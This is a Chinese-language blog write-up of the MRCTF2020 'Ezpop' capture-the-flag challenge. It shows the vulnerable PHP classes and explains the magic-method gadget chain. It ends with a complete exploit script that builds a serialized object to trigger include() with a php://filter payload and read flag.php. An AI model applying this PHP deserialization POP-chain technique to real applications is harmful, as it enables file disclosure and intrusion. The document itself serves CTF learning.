devbox
木道寻08
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

[MRCTF2020]Ezpop 1

作者:木道寻08 | 2024-08-06 08:37:57

[MRCTF2020]Ezpop 1
知识点:各种魔术方法,以及构造反序列化pop链子的思路

  • 1
<?php
//flag is in flag.php
class Modifier {
    protected  $var;
    public function append($value){
        include($value);//漏洞利用点
    }
    public function __invoke(){
        //在类被当作函数调用的时候会,例如:Modifiter()这样的时候会被调用。
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        //在类被当作字符串的时候会被调用
        return $this->str->source;
    }

    public function __wakeup(){//反序列化时调用
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        //当调用类的一个不存在的属性时候,或者一个protected 或 private的属性时候则会自动调用它。
        $function = $this->p;
        return $function();//可以触发Modifier 
    }
}



  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41
  • 42
  • 43
  • 44
  • 45
  • 46
  • 47

这类题型我是今天才接触的,,借鉴了不少师傅的,所以有些地方可能会和其他人一样。

分析:

先找可以执行shell的位置,或者文件包含的位置,然后通过这个点一步一步向上推。

例如,这题的洞在include($value);,我们可以通过这个执行伪代码php://filter/read=convert.base64-encode/resource=flag.php,且它在function append中。

那么要怎么执行这个呢?可以通过function __invoke来执行function append

function __invoke又可以通过function __get$function();
来实现。

function __get可以通过function __toString$this->str->source;来实现,使得str=new Test(),source=xxx.

最后function __toString,可以通过function __constructecho 'Welcome to '.$this->source."<br>";来实现

链子

<?php
//flag is in flag.php
class Modifier {
    protected  $var='php://filter/read=convert.base64-encode/resource=flag.php';
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = new Modifier();
    }
}


$a = new Show("self");//可以在__construct中的echo时触发__toString
$a->str = new Test();//可以触发__get
$c = new Show($a);
echo urlencode(serialize($c));

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26

这边用urlencode的原因是:

图来自:https://blog.csdn.net/weixin_45642610/article/details/115919505
在这里插入图片描述

参考:

https://blog.csdn.net/weixin_45577185/article/details/120753245
https://blog.csdn.net/weixin_45642610/article/details/115919505

本文内容由网友自发贡献,转载请注明出处:https://www.wpsshop.cn/w/木道寻08/article/detail/936706
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号